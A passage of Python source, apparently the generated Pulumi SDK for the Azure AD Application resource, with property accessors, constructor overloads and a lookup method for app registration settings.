if tags is not None:
pulumi.set(__self__, "tags", tags)
if template_id is not None:
pulumi.set(__self__, "template_id", template_id)
if terms_of_service_url is not None:
pulumi.set(__self__, "terms_of_service_url", terms_of_service_url)
if web is not None:
pulumi.set(__self__, "web", web)
@property
@pulumi.getter
def api(self) -> Optional[pulumi.Input['ApplicationApiArgs']]:
"""
An `api` block as documented below, which configures API related settings for this application.
"""
return pulumi.get(self, "api")
@api.setter
def api(self, value: Optional[pulumi.Input['ApplicationApiArgs']]):
pulumi.set(self, "api", value)
@property
@pulumi.getter(name="appRoleIds")
def app_role_ids(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:
"""
A mapping of app role values to app role IDs, intended to be useful when referencing app roles in other resources in your configuration.
"""
return pulumi.get(self, "app_role_ids")
@app_role_ids.setter
def app_role_ids(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]):
pulumi.set(self, "app_role_ids", value)
@property
@pulumi.getter(name="appRoles")
def app_roles(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['ApplicationAppRoleArgs']]]]:
"""
A collection of `app_role` blocks as documented below. For more information see [official documentation on Application Roles](https://docs.microsoft.com/en-us/azure/architecture/multitenant-identity/app-roles).
"""
return pulumi.get(self, "app_roles")
@app_roles.setter
def app_roles(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['ApplicationAppRoleArgs']]]]):
pulumi.set(self, "app_roles", value)
@property
@pulumi.getter(name="applicationId")
def application_id(self) -> Optional[pulumi.Input[str]]:
"""
The Application ID (also called Client ID).
"""
return pulumi.get(self, "application_id")
@application_id.setter
def application_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "application_id", value)
@property
@pulumi.getter(name="deviceOnlyAuthEnabled")
def device_only_auth_enabled(self) -> Optional[pulumi.Input[bool]]:
"""
Specifies whether this application supports device authentication without a user. Defaults to `false`.
"""
return pulumi.get(self, "device_only_auth_enabled")
@device_only_auth_enabled.setter
def device_only_auth_enabled(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "device_only_auth_enabled", value)
@property
@pulumi.getter(name="disabledByMicrosoft")
def disabled_by_microsoft(self) -> Optional[pulumi.Input[str]]:
"""
Whether Microsoft has disabled the registered application. If the application is disabled, this will be a string indicating the status/reason, e.g. `DisabledDueToViolationOfServicesAgreement`
"""
return pulumi.get(self, "disabled_by_microsoft")
@disabled_by_microsoft.setter
def disabled_by_microsoft(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "disabled_by_microsoft", value)
@property
@pulumi.getter(name="displayName")
def display_name(self) -> Optional[pulumi.Input[str]]:
"""
The display name for the application.
"""
return pulumi.get(self, "display_name")
@display_name.setter
def display_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "display_name", value)
@property
@pulumi.getter(name="fallbackPublicClientEnabled")
def fallback_public_client_enabled(self) -> Optional[pulumi.Input[bool]]:
"""
Specifies whether the application is a public client. Appropriate for apps using token grant flows that don't use a redirect URI. Defaults to `false`.
"""
return pulumi.get(self, "fallback_public_client_enabled")
@fallback_public_client_enabled.setter
def fallback_public_client_enabled(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "fallback_public_client_enabled", value)
@property
@pulumi.getter(name="featureTags")
def feature_tags(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['ApplicationFeatureTagArgs']]]]:
"""
A `feature_tags` block as described below. Cannot be used together with the `tags` property.
"""
return pulumi.get(self, "feature_tags")
@feature_tags.setter
def feature_tags(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['ApplicationFeatureTagArgs']]]]):
pulumi.set(self, "feature_tags", value)
@property
@pulumi.getter(name="groupMembershipClaims")
def group_membership_claims(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
Configures the `groups` claim issued in a user or OAuth 2.0 access token that the app expects. Possible values are `None`, `SecurityGroup`, `DirectoryRole`, `ApplicationGroup` or `All`.
"""
return pulumi.get(self, "group_membership_claims")
@group_membership_claims.setter
def group_membership_claims(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "group_membership_claims", value)
@property
@pulumi.getter(name="identifierUris")
def identifier_uris(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
A set of user-defined URI(s) that uniquely identify an application within its Azure AD tenant, or within a verified custom domain if the application is multi-tenant.
"""
return pulumi.get(self, "identifier_uris")
@identifier_uris.setter
def identifier_uris(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "identifier_uris", value)
@property
@pulumi.getter(name="logoImage")
def logo_image(self) -> Optional[pulumi.Input[str]]:
"""
A logo image to upload for the application, as a raw base64-encoded string. The image should be in gif, jpeg or png format. Note that once an image has been uploaded, it is not possible to remove it without replacing it with another image.
"""
return pulumi.get(self, "logo_image")
@logo_image.setter
def logo_image(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "logo_image", value)
@property
@pulumi.getter(name="logoUrl")
def logo_url(self) -> Optional[pulumi.Input[str]]:
"""
CDN URL to the application's logo, as uploaded with the `logo_image` property.
"""
return pulumi.get(self, "logo_url")
@logo_url.setter
def logo_url(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "logo_url", value)
@property
@pulumi.getter(name="marketingUrl")
def marketing_url(self) -> Optional[pulumi.Input[str]]:
"""
URL of the application's marketing page.
"""
return pulumi.get(self, "marketing_url")
@marketing_url.setter
def marketing_url(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "marketing_url", value)
@property
@pulumi.getter(name="oauth2PermissionScopeIds")
def oauth2_permission_scope_ids(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:
"""
A mapping of OAuth2.0 permission scope values to scope IDs, intended to be useful when referencing permission scopes in other resources in your configuration.
"""
return pulumi.get(self, "oauth2_permission_scope_ids")
@oauth2_permission_scope_ids.setter
def oauth2_permission_scope_ids(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]):
pulumi.set(self, "oauth2_permission_scope_ids", value)
@property
@pulumi.getter(name="oauth2PostResponseRequired")
def oauth2_post_response_required(self) -> Optional[pulumi.Input[bool]]:
"""
Specifies whether, as part of OAuth 2.0 token requests, Azure AD allows POST requests, as opposed to GET requests. Defaults to `false`, which specifies that only GET requests are allowed.
"""
return pulumi.get(self, "oauth2_post_response_required")
@oauth2_post_response_required.setter
def oauth2_post_response_required(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "oauth2_post_response_required", value)
@property
@pulumi.getter(name="objectId")
def object_id(self) -> Optional[pulumi.Input[str]]:
"""
The application's object ID.
"""
return pulumi.get(self, "object_id")
@object_id.setter
def object_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "object_id", value)
@property
@pulumi.getter(name="optionalClaims")
def optional_claims(self) -> Optional[pulumi.Input['ApplicationOptionalClaimsArgs']]:
"""
An `optional_claims` block as documented below.
"""
return pulumi.get(self, "optional_claims")
@optional_claims.setter
def optional_claims(self, value: Optional[pulumi.Input['ApplicationOptionalClaimsArgs']]):
pulumi.set(self, "optional_claims", value)
@property
@pulumi.getter
def owners(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
A set of object IDs of principals that will be granted ownership of the application. Supported object types are users or service principals. By default, no owners are assigned.
"""
return pulumi.get(self, "owners")
@owners.setter
def owners(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "owners", value)
@property
@pulumi.getter(name="preventDuplicateNames")
def prevent_duplicate_names(self) -> Optional[pulumi.Input[bool]]:
"""
If `true`, will return an error if an existing application is found with the same name. Defaults to `false`.
"""
return pulumi.get(self, "prevent_duplicate_names")
@prevent_duplicate_names.setter
def prevent_duplicate_names(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "prevent_duplicate_names", value)
@property
@pulumi.getter(name="privacyStatementUrl")
def privacy_statement_url(self) -> Optional[pulumi.Input[str]]:
"""
URL of the application's privacy statement.
"""
return pulumi.get(self, "privacy_statement_url")
@privacy_statement_url.setter
def privacy_statement_url(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "privacy_statement_url", value)
@property
@pulumi.getter(name="publicClient")
def public_client(self) -> Optional[pulumi.Input['ApplicationPublicClientArgs']]:
"""
A `public_client` block as documented below, which configures non-web app or non-web API application settings, for example mobile or other public clients such as an installed application running on a desktop device.
"""
return pulumi.get(self, "public_client")
@public_client.setter
def public_client(self, value: Optional[pulumi.Input['ApplicationPublicClientArgs']]):
pulumi.set(self, "public_client", value)
@property
@pulumi.getter(name="publisherDomain")
def publisher_domain(self) -> Optional[pulumi.Input[str]]:
"""
The verified publisher domain for the application.
"""
return pulumi.get(self, "publisher_domain")
@publisher_domain.setter
def publisher_domain(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "publisher_domain", value)
@property
@pulumi.getter(name="requiredResourceAccesses")
def required_resource_accesses(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['ApplicationRequiredResourceAccessArgs']]]]:
"""
A collection of `required_resource_access` blocks as documented below.
"""
return pulumi.get(self, "required_resource_accesses")
@required_resource_accesses.setter
def required_resource_accesses(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['ApplicationRequiredResourceAccessArgs']]]]):
pulumi.set(self, "required_resource_accesses", value)
@property
@pulumi.getter(name="signInAudience")
def sign_in_audience(self) -> Optional[pulumi.Input[str]]:
"""
The Microsoft account types that are supported for the current application. Must be one of `AzureADMyOrg`, `AzureADMultipleOrgs`, `AzureADandPersonalMicrosoftAccount` or `PersonalMicrosoftAccount`. Defaults to `AzureADMyOrg`.
"""
return pulumi.get(self, "sign_in_audience")
@sign_in_audience.setter
def sign_in_audience(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "sign_in_audience", value)
@property
@pulumi.getter(name="singlePageApplication")
def single_page_application(self) -> Optional[pulumi.Input['ApplicationSinglePageApplicationArgs']]:
"""
A `single_page_application` block as documented below, which configures single-page application (SPA) related settings for this application.
"""
return pulumi.get(self, "single_page_application")
@single_page_application.setter
def single_page_application(self, value: Optional[pulumi.Input['ApplicationSinglePageApplicationArgs']]):
pulumi.set(self, "single_page_application", value)
@property
@pulumi.getter(name="supportUrl")
def support_url(self) -> Optional[pulumi.Input[str]]:
"""
URL of the application's support page.
"""
return pulumi.get(self, "support_url")
@support_url.setter
def support_url(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "support_url", value)
@property
@pulumi.getter
def tags(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
    """
    The set of tags applied to the application. Mutually exclusive with the
    `feature_tags` block.
    """
    tag_set = pulumi.get(self, "tags")
    return tag_set

@tags.setter
def tags(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
    """Set the application's tags."""
    pulumi.set(self, "tags", value)
@property
@pulumi.getter(name="templateId")
def template_id(self) -> Optional[pulumi.Input[str]]:
    """
    Unique ID of a templated application in the Azure AD App Gallery from
    which to create the application. Changing this forces a new resource
    to be created.
    """
    tpl = pulumi.get(self, "template_id")
    return tpl

@template_id.setter
def template_id(self, value: Optional[pulumi.Input[str]]):
    """Set the gallery template ID (changing it forces recreation)."""
    pulumi.set(self, "template_id", value)
@property
@pulumi.getter(name="termsOfServiceUrl")
def terms_of_service_url(self) -> Optional[pulumi.Input[str]]:
    """The URL of the application's terms of service statement, if any."""
    url = pulumi.get(self, "terms_of_service_url")
    return url

@terms_of_service_url.setter
def terms_of_service_url(self, value: Optional[pulumi.Input[str]]):
    """Set the terms of service URL."""
    pulumi.set(self, "terms_of_service_url", value)
@property
@pulumi.getter
def web(self) -> Optional[pulumi.Input['ApplicationWebArgs']]:
    """
    The `web` block holding web related settings for this application, as
    documented below.
    """
    web_block = pulumi.get(self, "web")
    return web_block

@web.setter
def web(self, value: Optional[pulumi.Input['ApplicationWebArgs']]):
    """Set the `web` configuration block."""
    pulumi.set(self, "web", value)
class Application(pulumi.CustomResource):
    """Manages an application registration within Azure Active Directory.

    NOTE(review): generated Pulumi resource class (resource type token
    `azuread:index/application:Application`). Construction is overloaded:
    pass either an ``ApplicationArgs`` bundle or the individual keyword
    arguments; ``__init__`` dispatches to ``_internal_init``, which performs
    the actual registration with the Pulumi engine.
    """

    @overload
    def __init__(__self__,
                 resource_name: str,
                 opts: Optional[pulumi.ResourceOptions] = None,
                 api: Optional[pulumi.Input[pulumi.InputType['ApplicationApiArgs']]] = None,
                 app_roles: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['ApplicationAppRoleArgs']]]]] = None,
                 device_only_auth_enabled: Optional[pulumi.Input[bool]] = None,
                 display_name: Optional[pulumi.Input[str]] = None,
                 fallback_public_client_enabled: Optional[pulumi.Input[bool]] = None,
                 feature_tags: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['ApplicationFeatureTagArgs']]]]] = None,
                 group_membership_claims: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
                 identifier_uris: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
                 logo_image: Optional[pulumi.Input[str]] = None,
                 marketing_url: Optional[pulumi.Input[str]] = None,
                 oauth2_post_response_required: Optional[pulumi.Input[bool]] = None,
                 optional_claims: Optional[pulumi.Input[pulumi.InputType['ApplicationOptionalClaimsArgs']]] = None,
                 owners: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
                 prevent_duplicate_names: Optional[pulumi.Input[bool]] = None,
                 privacy_statement_url: Optional[pulumi.Input[str]] = None,
                 public_client: Optional[pulumi.Input[pulumi.InputType['ApplicationPublicClientArgs']]] = None,
                 required_resource_accesses: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['ApplicationRequiredResourceAccessArgs']]]]] = None,
                 sign_in_audience: Optional[pulumi.Input[str]] = None,
                 single_page_application: Optional[pulumi.Input[pulumi.InputType['ApplicationSinglePageApplicationArgs']]] = None,
                 support_url: Optional[pulumi.Input[str]] = None,
                 tags: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
                 template_id: Optional[pulumi.Input[str]] = None,
                 terms_of_service_url: Optional[pulumi.Input[str]] = None,
                 web: Optional[pulumi.Input[pulumi.InputType['ApplicationWebArgs']]] = None,
                 __props__=None):
        """
        ## Import

        Applications can be imported using their object ID, e.g.

        ```sh
        $ pulumi import azuread:index/application:Application test 00000000-0000-0000-0000-000000000000
        ```

        :param str resource_name: The name of the resource.
        :param pulumi.ResourceOptions opts: Options for the resource.
        :param pulumi.Input[pulumi.InputType['ApplicationApiArgs']] api: An `api` block as documented below, which configures API related settings for this application.
        :param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['ApplicationAppRoleArgs']]]] app_roles: A collection of `app_role` blocks as documented below. For more information see [official documentation on Application Roles](https://docs.microsoft.com/en-us/azure/architecture/multitenant-identity/app-roles).
        :param pulumi.Input[bool] device_only_auth_enabled: Specifies whether this application supports device authentication without a user. Defaults to `false`.
        :param pulumi.Input[str] display_name: The display name for the application.
        :param pulumi.Input[bool] fallback_public_client_enabled: Specifies whether the application is a public client. Appropriate for apps using token grant flows that don't use a redirect URI. Defaults to `false`.
        :param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['ApplicationFeatureTagArgs']]]] feature_tags: A `feature_tags` block as described below. Cannot be used together with the `tags` property.
        :param pulumi.Input[Sequence[pulumi.Input[str]]] group_membership_claims: Configures the `groups` claim issued in a user or OAuth 2.0 access token that the app expects. Possible values are `None`, `SecurityGroup`, `DirectoryRole`, `ApplicationGroup` or `All`.
        :param pulumi.Input[Sequence[pulumi.Input[str]]] identifier_uris: A set of user-defined URI(s) that uniquely identify an application within its Azure AD tenant, or within a verified custom domain if the application is multi-tenant.
        :param pulumi.Input[str] logo_image: A logo image to upload for the application, as a raw base64-encoded string. The image should be in gif, jpeg or png format. Note that once an image has been uploaded, it is not possible to remove it without replacing it with another image.
        :param pulumi.Input[str] marketing_url: URL of the application's marketing page.
        :param pulumi.Input[bool] oauth2_post_response_required: Specifies whether, as part of OAuth 2.0 token requests, Azure AD allows POST requests, as opposed to GET requests. Defaults to `false`, which specifies that only GET requests are allowed.
        :param pulumi.Input[pulumi.InputType['ApplicationOptionalClaimsArgs']] optional_claims: An `optional_claims` block as documented below.
        :param pulumi.Input[Sequence[pulumi.Input[str]]] owners: A set of object IDs of principals that will be granted ownership of the application. Supported object types are users or service principals. By default, no owners are assigned.
        :param pulumi.Input[bool] prevent_duplicate_names: If `true`, will return an error if an existing application is found with the same name. Defaults to `false`.
        :param pulumi.Input[str] privacy_statement_url: URL of the application's privacy statement.
        :param pulumi.Input[pulumi.InputType['ApplicationPublicClientArgs']] public_client: A `public_client` block as documented below, which configures non-web app or non-web API application settings, for example mobile or other public clients such as an installed application running on a desktop device.
        :param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['ApplicationRequiredResourceAccessArgs']]]] required_resource_accesses: A collection of `required_resource_access` blocks as documented below.
        :param pulumi.Input[str] sign_in_audience: The Microsoft account types that are supported for the current application. Must be one of `AzureADMyOrg`, `AzureADMultipleOrgs`, `AzureADandPersonalMicrosoftAccount` or `PersonalMicrosoftAccount`. Defaults to `AzureADMyOrg`.
        :param pulumi.Input[pulumi.InputType['ApplicationSinglePageApplicationArgs']] single_page_application: A `single_page_application` block as documented below, which configures single-page application (SPA) related settings for this application.
        :param pulumi.Input[str] support_url: URL of the application's support page.
        :param pulumi.Input[Sequence[pulumi.Input[str]]] tags: A set of tags to apply to the application. Cannot be used together with the `feature_tags` block.
        :param pulumi.Input[str] template_id: Unique ID for a templated application in the Azure AD App Gallery, from which to create the application. Changing this forces a new resource to be created.
        :param pulumi.Input[str] terms_of_service_url: URL of the application's terms of service statement.
        :param pulumi.Input[pulumi.InputType['ApplicationWebArgs']] web: A `web` block as documented below, which configures web related settings for this application.
        """
        ...

    @overload
    def __init__(__self__,
                 resource_name: str,
                 args: ApplicationArgs,
                 opts: Optional[pulumi.ResourceOptions] = None):
        """
        ## Import

        Applications can be imported using their object ID, e.g.

        ```sh
        $ pulumi import azuread:index/application:Application test 00000000-0000-0000-0000-000000000000
        ```

        :param str resource_name: The name of the resource.
        :param ApplicationArgs args: The arguments to use to populate this resource's properties.
        :param pulumi.ResourceOptions opts: Options for the resource.
        """
        ...

    def __init__(__self__, resource_name: str, *args, **kwargs):
        # Dispatch between the two overloads above: either a single
        # ApplicationArgs positional argument or plain keyword arguments.
        resource_args, opts = _utilities.get_resource_args_opts(ApplicationArgs, pulumi.ResourceOptions, *args, **kwargs)
        if resource_args is not None:
            __self__._internal_init(resource_name, opts, **resource_args.__dict__)
        else:
            __self__._internal_init(resource_name, *args, **kwargs)

    def _internal_init(__self__,
                       resource_name: str,
                       opts: Optional[pulumi.ResourceOptions] = None,
                       api: Optional[pulumi.Input[pulumi.InputType['ApplicationApiArgs']]] = None,
                       app_roles: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['ApplicationAppRoleArgs']]]]] = None,
                       device_only_auth_enabled: Optional[pulumi.Input[bool]] = None,
                       display_name: Optional[pulumi.Input[str]] = None,
                       fallback_public_client_enabled: Optional[pulumi.Input[bool]] = None,
                       feature_tags: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['ApplicationFeatureTagArgs']]]]] = None,
                       group_membership_claims: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
                       identifier_uris: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
                       logo_image: Optional[pulumi.Input[str]] = None,
                       marketing_url: Optional[pulumi.Input[str]] = None,
                       oauth2_post_response_required: Optional[pulumi.Input[bool]] = None,
                       optional_claims: Optional[pulumi.Input[pulumi.InputType['ApplicationOptionalClaimsArgs']]] = None,
                       owners: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
                       prevent_duplicate_names: Optional[pulumi.Input[bool]] = None,
                       privacy_statement_url: Optional[pulumi.Input[str]] = None,
                       public_client: Optional[pulumi.Input[pulumi.InputType['ApplicationPublicClientArgs']]] = None,
                       required_resource_accesses: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['ApplicationRequiredResourceAccessArgs']]]]] = None,
                       sign_in_audience: Optional[pulumi.Input[str]] = None,
                       single_page_application: Optional[pulumi.Input[pulumi.InputType['ApplicationSinglePageApplicationArgs']]] = None,
                       support_url: Optional[pulumi.Input[str]] = None,
                       tags: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
                       template_id: Optional[pulumi.Input[str]] = None,
                       terms_of_service_url: Optional[pulumi.Input[str]] = None,
                       web: Optional[pulumi.Input[pulumi.InputType['ApplicationWebArgs']]] = None,
                       __props__=None):
        # Normalize and validate the resource options before registration.
        if opts is None:
            opts = pulumi.ResourceOptions()
        if not isinstance(opts, pulumi.ResourceOptions):
            raise TypeError('Expected resource options to be a ResourceOptions instance')
        if opts.version is None:
            opts.version = _utilities.get_version()
        if opts.id is None:
            # No resource ID supplied: we are creating a new resource, so
            # assemble the input property bag from the keyword arguments.
            if __props__ is not None:
                raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
            __props__ = ApplicationArgs.__new__(ApplicationArgs)

            __props__.__dict__["api"] = api
            __props__.__dict__["app_roles"] = app_roles
            __props__.__dict__["device_only_auth_enabled"] = device_only_auth_enabled
            # display_name is required unless the engine is rehydrating the
            # resource from an existing URN.
            if display_name is None and not opts.urn:
                raise TypeError("Missing required property 'display_name'")
            __props__.__dict__["display_name"] = display_name
            __props__.__dict__["fallback_public_client_enabled"] = fallback_public_client_enabled
            __props__.__dict__["feature_tags"] = feature_tags
            __props__.__dict__["group_membership_claims"] = group_membership_claims
            __props__.__dict__["identifier_uris"] = identifier_uris
            __props__.__dict__["logo_image"] = logo_image
            __props__.__dict__["marketing_url"] = marketing_url
            __props__.__dict__["oauth2_post_response_required"] = oauth2_post_response_required
            __props__.__dict__["optional_claims"] = optional_claims
            __props__.__dict__["owners"] = owners
            __props__.__dict__["prevent_duplicate_names"] = prevent_duplicate_names
            __props__.__dict__["privacy_statement_url"] = privacy_statement_url
            __props__.__dict__["public_client"] = public_client
            __props__.__dict__["required_resource_accesses"] = required_resource_accesses
            __props__.__dict__["sign_in_audience"] = sign_in_audience
            __props__.__dict__["single_page_application"] = single_page_application
            __props__.__dict__["support_url"] = support_url
            __props__.__dict__["tags"] = tags
            __props__.__dict__["template_id"] = template_id
            __props__.__dict__["terms_of_service_url"] = terms_of_service_url
            __props__.__dict__["web"] = web
            # Output-only attributes start as None; the provider fills them
            # in after the resource is created.
            __props__.__dict__["app_role_ids"] = None
            __props__.__dict__["application_id"] = None
            __props__.__dict__["disabled_by_microsoft"] = None
            __props__.__dict__["logo_url"] = None
            __props__.__dict__["oauth2_permission_scope_ids"] = None
            __props__.__dict__["object_id"] = None
            __props__.__dict__["publisher_domain"] = None
        # Register the resource with the Pulumi engine.
        super(Application, __self__).__init__(
            'azuread:index/application:Application',
            resource_name,
            __props__,
            opts)

    @staticmethod
    def get(resource_name: str,
            id: pulumi.Input[str],
            opts: Optional[pulumi.ResourceOptions] = None,
            api: Optional[pulumi.Input[pulumi.InputType['ApplicationApiArgs']]] = None,
            app_role_ids: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
            app_roles: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['ApplicationAppRoleArgs']]]]] = None,
            application_id: Optional[pulumi.Input[str]] = None,
            device_only_auth_enabled: Optional[pulumi.Input[bool]] = None,
            disabled_by_microsoft: Optional[pulumi.Input[str]] = None,
            display_name: Optional[pulumi.Input[str]] = None,
            fallback_public_client_enabled: Optional[pulumi.Input[bool]] = None,
            feature_tags: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['ApplicationFeatureTagArgs']]]]] = None,
            group_membership_claims: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
            identifier_uris: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
            logo_image: Optional[pulumi.Input[str]] = None,
            logo_url: Optional[pulumi.Input[str]] = None,
            marketing_url: Optional[pulumi.Input[str]] = None,
            oauth2_permission_scope_ids: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
            oauth2_post_response_required: Optional[pulumi.Input[bool]] = None,
            object_id: Optional[pulumi.Input[str]] = None,
            optional_claims: Optional[pulumi.Input[pulumi.InputType['ApplicationOptionalClaimsArgs']]] = None,
            owners: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
            prevent_duplicate_names: Optional[pulumi.Input[bool]] = None,
            privacy_statement_url: Optional[pulumi.Input[str]] = None,
            public_client: Optional[pulumi.Input[pulumi.InputType['ApplicationPublicClientArgs']]] = None,
            publisher_domain: Optional[pulumi.Input[str]] = None,
            required_resource_accesses: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['ApplicationRequiredResourceAccessArgs']]]]] = None,
            sign_in_audience: Optional[pulumi.Input[str]] = None,
            single_page_application: Optional[pulumi.Input[pulumi.InputType['ApplicationSinglePageApplicationArgs']]] = None,
            support_url: Optional[pulumi.Input[str]] = None,
            tags: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
            template_id: Optional[pulumi.Input[str]] = None,
            terms_of_service_url: Optional[pulumi.Input[str]] = None,
            web: Optional[pulumi.Input[pulumi.InputType['ApplicationWebArgs']]] = None) -> 'Application':
        """
        Get an existing Application resource's state with the given name, id, and optional extra
        properties used to qualify the lookup.

        :param str resource_name: The unique name of the resulting resource.
        :param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
        :param pulumi.ResourceOptions opts: Options for the resource.
        :param pulumi.Input[pulumi.InputType['ApplicationApiArgs']] api: An `api` block as documented below, which configures API related settings for this application.
        :param pulumi.Input[Mapping[str, pulumi.Input[str]]] app_role_ids: A mapping of app role values to app role IDs, intended to be useful when referencing app roles in other resources in your configuration.
        :param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['ApplicationAppRoleArgs']]]] app_roles: A collection of `app_role` blocks as documented below. For more information see [official documentation on Application Roles](https://docs.microsoft.com/en-us/azure/architecture/multitenant-identity/app-roles).
        :param pulumi.Input[str] application_id: The Application ID (also called Client ID).
        :param pulumi.Input[bool] device_only_auth_enabled: Specifies whether this application supports device authentication without a user. Defaults to `false`.
        :param pulumi.Input[str] disabled_by_microsoft: Whether Microsoft has disabled the registered application. If the application is disabled, this will be a string indicating the status/reason, e.g. `DisabledDueToViolationOfServicesAgreement`
        :param pulumi.Input[str] display_name: The display name for the application.
        :param pulumi.Input[bool] fallback_public_client_enabled: Specifies whether the application is a public client. Appropriate for apps using token grant flows that don't use a redirect URI. Defaults to `false`.
        :param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['ApplicationFeatureTagArgs']]]] feature_tags: A `feature_tags` block as described below. Cannot be used together with the `tags` property.
        :param pulumi.Input[Sequence[pulumi.Input[str]]] group_membership_claims: Configures the `groups` claim issued in a user or OAuth 2.0 access token that the app expects. Possible values are `None`, `SecurityGroup`, `DirectoryRole`, `ApplicationGroup` or `All`.
        :param pulumi.Input[Sequence[pulumi.Input[str]]] identifier_uris: A set of user-defined URI(s) that uniquely identify an application within its Azure AD tenant, or within a verified custom domain if the application is multi-tenant.
        :param pulumi.Input[str] logo_image: A logo image to upload for the application, as a raw base64-encoded string. The image should be in gif, jpeg or png format. Note that once an image has been uploaded, it is not possible to remove it without replacing it with another image.
        :param pulumi.Input[str] logo_url: CDN URL to the application's logo, as uploaded with the `logo_image` property.
        :param pulumi.Input[str] marketing_url: URL of the application's marketing page.
        :param pulumi.Input[Mapping[str, pulumi.Input[str]]] oauth2_permission_scope_ids: A mapping of OAuth2.0 permission scope values to scope IDs, intended to be useful when referencing permission scopes in other resources in your configuration.
        :param pulumi.Input[bool] oauth2_post_response_required: Specifies whether, as part of OAuth 2.0 token requests, Azure AD allows POST requests, as opposed to GET requests. Defaults to `false`, which specifies that only GET requests are allowed.
        :param pulumi.Input[str] object_id: The application's object ID.
        :param pulumi.Input[pulumi.InputType['ApplicationOptionalClaimsArgs']] optional_claims: An `optional_claims` block as documented below.
        :param pulumi.Input[Sequence[pulumi.Input[str]]] owners: A set of object IDs of principals that will be granted ownership of the application. Supported object types are users or service principals. By default, no owners are assigned.
        :param pulumi.Input[bool] prevent_duplicate_names: If `true`, will return an error if an existing application is found with the same name. Defaults to `false`.
        :param pulumi.Input[str] privacy_statement_url: URL of the application's privacy statement.
        :param pulumi.Input[pulumi.InputType['ApplicationPublicClientArgs']] public_client: A `public_client` block as documented below, which configures non-web app or non-web API application settings, for example mobile or other public clients such as an installed application running on a desktop device.
        :param pulumi.Input[str] publisher_domain: The verified publisher domain for the application.
        :param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['ApplicationRequiredResourceAccessArgs']]]] required_resource_accesses: A collection of `required_resource_access` blocks as documented below.
        :param pulumi.Input[str] sign_in_audience: The Microsoft account types that are supported for the current application. Must be one of `AzureADMyOrg`, `AzureADMultipleOrgs`, `AzureADandPersonalMicrosoftAccount` or `PersonalMicrosoftAccount`. Defaults to `AzureADMyOrg`.
        :param pulumi.Input[pulumi.InputType['ApplicationSinglePageApplicationArgs']] single_page_application: A `single_page_application` block as documented below, which configures single-page application (SPA) related settings for this application.
        :param pulumi.Input[str] support_url: URL of the application's support page.
        :param pulumi.Input[Sequence[pulumi.Input[str]]] tags: A set of tags to apply to the application. Cannot be used together with the `feature_tags` block.
        :param pulumi.Input[str] template_id: Unique ID for a templated application in the Azure AD App Gallery, from which to create the application. Changing this forces a new resource to be created.
        :param pulumi.Input[str] terms_of_service_url: URL of the application's terms of service statement.
